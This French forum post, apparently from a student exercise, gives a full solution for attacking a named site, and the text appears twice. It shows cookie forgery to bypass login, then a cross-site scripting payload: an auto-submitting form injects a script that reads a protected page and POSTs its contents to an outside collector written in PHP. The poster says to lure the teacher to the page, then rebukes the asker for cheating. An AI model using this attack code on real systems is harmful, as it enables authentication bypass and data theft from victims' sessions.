Se connecter
Inscription
Mot de passe perdu
Supprimer un message
rfr
Suffit de définir les cookies "à la main" dans firefox par ex:
connected=true
email=f@f.com
password=nimporte
et d'aller sur la bonne url.
Pour la phase2:
bust.html
<html>
<head>
<title>bust</title>
</head>
<body onload="init();">
<script type="text/javascript">
function init() {
document.getElementById("form").submit();
}
</script>
<form id="form" action="http://esidcf.alwaysdata.net/search.php" method="post">
<input type="hidden" name="personName" value='</div><script type="text/javascript" src="http://server/test.js"></script><div>'/>
<input type="submit" />
</form>
</body>
</html>
test.js
function httpGet(theUrl)
{
var xmlHttp = null;
xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", theUrl, false );
xmlHttp.send( null );
return xmlHttp.responseText;
}
function httpPost(theUrl,data)
{
var xmlHttp = null;
xmlHttp = new XMLHttpRequest();
xmlHttp.open( "POST", theUrl, false );
xmlHttp.send( data );
}
var result = httpGet("http://esidcf.alwaysdata.net/coffre.php");
httpPost("http://server/damnedpost.php", result);
damnedpost.php
<?php
file_put_contents('/tmp/xxtest.txt', file_get_contents('php://input'));
?>
Suffit de rediriger le prof vers l'url http://server/bust.html
Il y a un exception dans le httpPost de test.js mais comme ça fonctionne quand même, je n'ai pas cherché.
Mais comme toi non plus et que la solution à l'exercice est ici, tu auras zéro et puis c'est tout.
Maintenant il faudra expliquer à ton prof pourquoi tu as essayé de tricher et que maintenant, son exercice est tout pourri parce que la solution est sur le net. C'est malin hein ...
connected=true
email=f@f.com
password=nimporte
et d'aller sur la bonne url.
Pour la phase2:
bust.html
<html>
<head>
<title>bust</title>
</head>
<body onload="init();">
<script type="text/javascript">
function init() {
document.getElementById("form").submit();
}
</script>
<form id="form" action="http://esidcf.alwaysdata.net/search.php" method="post">
<input type="hidden" name="personName" value='</div><script type="text/javascript" src="http://server/test.js"></script><div>'/>
<input type="submit" />
</form>
</body>
</html>
test.js
function httpGet(theUrl)
{
var xmlHttp = null;
xmlHttp = new XMLHttpRequest();
xmlHttp.open( "GET", theUrl, false );
xmlHttp.send( null );
return xmlHttp.responseText;
}
function httpPost(theUrl,data)
{
var xmlHttp = null;
xmlHttp = new XMLHttpRequest();
xmlHttp.open( "POST", theUrl, false );
xmlHttp.send( data );
}
var result = httpGet("http://esidcf.alwaysdata.net/coffre.php");
httpPost("http://server/damnedpost.php", result);
damnedpost.php
<?php
file_put_contents('/tmp/xxtest.txt', file_get_contents('php://input'));
?>
Suffit de rediriger le prof vers l'url http://server/bust.html
Il y a un exception dans le httpPost de test.js mais comme ça fonctionne quand même, je n'ai pas cherché.
Mais comme toi non plus et que la solution à l'exercice est ici, tu auras zéro et puis c'est tout.
Maintenant il faudra expliquer à ton prof pourquoi tu as essayé de tricher et que maintenant, son exercice est tout pourri parce que la solution est sur le net. C'est malin hein ...
